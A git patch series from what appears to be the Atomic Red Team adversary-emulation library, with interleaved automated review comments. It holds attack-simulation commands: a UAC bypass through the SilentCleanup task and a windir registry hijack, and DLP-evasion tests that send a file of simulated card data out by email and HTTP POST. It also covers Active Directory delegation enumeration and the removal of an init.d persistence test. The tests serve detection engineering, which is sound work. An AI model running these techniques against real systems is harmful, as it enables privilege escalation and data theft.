@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En +
+
+ +## Atomic Test #9 - Bypass UAC using SilentCleanup task +Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ + +There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). + +For example, we can set the windir registry kye to: "cmd /k REM " + +And forcefully run SilentCleanup task: + +schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I + +REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{file_path} +``` + + + + + +
From 1540de2d2135095a0766f2123aaffbe3d2fdf881 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 3 Jun 2021 07:46:26 -0600 Subject: [PATCH 07/14] corrections as per BoBoSiKi008 (#1494) see Issue #1490 --- atomics/T1027/T1027.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 4288d3ae..7210e5af 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -109,7 +109,7 @@ atomic_tests: supported_platforms: - windows input_arguments: - input_file: + input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm @@ -125,10 +125,9 @@ atomic_tests: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" + Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP @@ -147,8 +146,7 @@ atomic_tests: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: command: | - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell From 9a3528e02721eb8b937b540559dfa6f8e2f884b8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 3 Jun 2021 13:47:03 +0000 Subject: [PATCH 08/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 9 +++------ atomics/T1027/T1027.md | 4 ++-- 2 files changed, 5 insertions(+), 8 deletions(-) 
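Review bot: in the second T1027.yaml hunk of PATCH 07/14, `Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}` still sends the literal path string as the request body rather than the macro file's contents, so the "DLP Evasion ... over HTTP" simulation never transmits the sensitive data it is meant to exercise; use `-InFile #{input_file}` to post the file. The change in the first hunk is correct: the old line wrapped the whole `Send-MailMessage` command in double quotes, so PowerShell evaluated it as a string and never ran it, and switching to `'T1027_Atomic_Test'` avoids the nested double quotes. Removing `dependency_executor_name: powershell` is fine only if neither test retains a `dependencies:` block, which the hunk context does not show; worth confirming before merge.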
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 375f275d..7db65eb5 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28937,11 +28937,9 @@ defense-evasion: description: SMTP Server IP Address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 - Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm - -SmtpServer #{smtp_server}" + command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' + -Attachments #{input_file} -SmtpServer #{smtp_server} ' name: powershell @@ -28961,9 +28959,8 @@ defense-evasion: description: Destination IP address type: string default: 127.0.0.1 - dependency_executor_name: powershell executor: - command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm + command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ' name: powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 74a09cdb..9f34ff74 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}" +Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server} ``` @@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p ```powershell -Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm +Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} ``` From 9b357633812ff2efdd473075aac619e00ffbf6df Mon Sep 17 00:00:00 2001 
From: Alex Flores Date: Fri, 4 Jun 2021 12:51:02 -0400 Subject: [PATCH 09/14] adds test for enumerating unconstrained delegation (#1495) * adds test for enumerating unconstrained delegation * small update to wording on dependency Co-authored-by: Carrie Roberts --- atomics/T1087.002/T1087.002.yaml | 48 +++++++++++++++++++++++++++++--- 1 file changed, 44 insertions(+), 4 deletions(-) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index d8f3a3f4..de4e2e26 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -69,7 +69,7 @@ atomic_tests: name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx supported_platforms: @@ -93,7 +93,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Admins auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ supported_platforms: 
@@ -117,7 +117,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory User Objects auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -141,7 +141,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Exchange AD Objects auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: 
@@ -173,3 +173,43 @@ atomic_tests: command: | net user administrator /domain name: command_prompt + +- name: Enumerate Active Directory for Unconstrained Delegation + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: | + PowerShell ActiveDirectory Module must be installed + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: | + Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} From 3afb4da266a1b42b55a0e8f003c441cedd482acb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 16:51:20 +0000 Subject: [PATCH 10/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1087.002/T1087.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index de4e2e26..61822ffb 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml 
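Review bot: the description says the test queries computer objects, but `(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})` carries no object-class clause, so it also returns user accounts with the bit set, and it always returns the domain controllers, whose accounts carry TRUSTED_FOR_DELEGATION by default; either wrap the filter as `(&(objectCategory=computer)(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop}))` or adjust the description so detection engineers replaying the test know what output to expect. The `524288` default is correct for the bitwise-AND matching rule (it needs decimal, not `0x80000`), but both arguments use `type: String` whereas the rest of the repository uses `type: string`. With `default: contoso.com` the `-Server` argument points at a domain that will not exist in most labs, so the test fails unless overridden; `$env:USERDNSDOMAIN` works as a default wherever the stated prerequisite (running as a domain user) holds. Finally, `get_prereq_command` installs RSAT via `Add-WindowsCapability` / `Install-WindowsFeature`, which needs an elevated shell even though the test itself has `elevation_required: false`; say so in the dependency description. The missing `auto_generated_guid` is supplied by the CI commit that follows.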
@@ -175,6 +175,7 @@ atomic_tests: name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b description: | Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 361e31fb..409c774d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -705,3 +705,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 58004e22-022c-4c51-b4a8-2b85ac5c596b 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 +46f8dbe9-22a5-4770-8513-66119c5be63b From 6c81bb1b0ba902269223281b5e3642f807bb6052 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 16:51:26 +0000 Subject: [PATCH 11/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 43 ++++++++++++++ atomics/T1087.002/T1087.002.md | 57 +++++++++++++++++++ 6 files changed, 104 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8f816a2c..0e530577 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -620,6 +620,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 703da0de..5d54166f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -438,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d1a78b05..a9ae5a7c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1121,6 +1121,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d1f5864e..5b6382dc 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -820,6 +820,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7db65eb5..69c30c6a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -49429,6 +49429,49 @@ discovery: ' name: command_prompt + - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: 'PowerShell ActiveDirectory Module must be installed + +' + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' + -Server #{domain} + +' T1069.002: technique: external_references: diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 2b80197a..f39060c1 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain @@ -344,4 +346,59 @@ net user administrator /domain +
+
+ +## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation +Attackers may attempt to query for computer objects with the UserAccountControl property +'TRUSTED_FOR_DELEGATION' (0x80000;524288) set +More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce +Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain FQDN | String | contoso.com| +| uac_prop | UAC Property to search | String | 524288| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: PowerShell ActiveDirectory Module must be installed +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + +
From 753c1d59ee78c8999eff65b84623e4c1c6e5cf31 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:12:47 +0000 Subject: [PATCH 12/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.002/T1543.002.md | 65 ---------------------------------- 1 file changed, 65 deletions(-) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 6f2f4e4b..c9bfec54 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) -- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) -
@@ -77,67 +75,4 @@ systemctl daemon-reload -
-
- -## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -cat > /etc/init.d/T1543.002 << EOF -#!/bin/bash -### BEGIN INIT INFO -# Provides : Atomic Test T1543.002 -# Required-Start: $all -# Required-Stop : -# Default-Start: 2 3 4 5 -# Default-Stop: -# Short Description: Atomic Test for Systemd Service Creation -### END INIT INFO -python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" -EOF - -chmod +x /etc/init.d/T1543.002 -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; -systemctl enable T1543.002 -systemctl start T1543.002 - -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 -systemctl daemon-reload -systemctl restart T1543.002 -``` - -#### Cleanup Commands: -```bash -systemctl stop T1543.002 -systemctl disable T1543.002 -rm -rf /etc/init.d/T1543.002 -systemctl daemon-reload -``` - - - -#### Dependencies: Run with `bash`! -##### Description: System must be Ubuntu ,Kali OR CentOS. 
-##### Check Prereq Commands: -```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; -``` -##### Get Prereq Commands: -```bash -echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. -``` - - - -
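Review bot: this generated commit deletes the Test #2 section from T1543.002.md, but the YAML change it mirrors (dropping the test from atomics/T1543.002/T1543.002.yaml) is not among the visible commits; make sure it is in the series, otherwise the next doc-generation run will restore this section. The removal is justified on its own merits: the prereq check used `exit /b 0` and `exit /b 1`, which is cmd.exe syntax, so under bash it fails with "numeric argument required" and a non-zero status and the dependency check could never pass; `chkconfig` is only reached through an `os-release` grep that breaks on unquoted output; and the test wrote a SysV script under `/etc/init.d` rather than the systemd unit file its name and the technique (T1543.002 Systemd Service) describe.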
From 1f1a002d89edfcb4101aed55c1dad905a7826219 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 17:14:19 +0000 Subject: [PATCH 13/14] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1037.004/T1037.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 9ec58a6f..6004b8b4 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -17,6 +17,7 @@ atomic_tests: - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: | Modify rc.common @@ -35,6 +36,7 @@ atomic_tests: origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: | Modify rc.local diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 409c774d..e78c5f95 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -706,3 +706,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 46f8dbe9-22a5-4770-8513-66119c5be63b +c33f3d80-5f04-419b-a13a-854d1cbdbf3a +126f71af-e1c9-405c-94ef-26a47b16c102 From 94d442bcd63fa9a8f802aecd8f0eaa7bd1157c79 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:14:26 +0000 Subject: [PATCH 14/14] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 4 + atomics/Indexes/Indexes-CSV/linux-index.csv | 4 + atomics/Indexes/Indexes-Markdown/index.md | 4 + .../Indexes/Indexes-Markdown/linux-index.md | 8 +- atomics/Indexes/Matrices/linux-matrix.md | 4 +- atomics/Indexes/index.yaml | 84 +++++++++++++++ atomics/T1037.004/T1037.004.md | 68 ++++++++++++ atomics/T1137.004/T1137.004.md | 102 ++++-------------- 9 files changed, 194 insertions(+), 86 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 31d2834b..fbe9e18a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"
techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518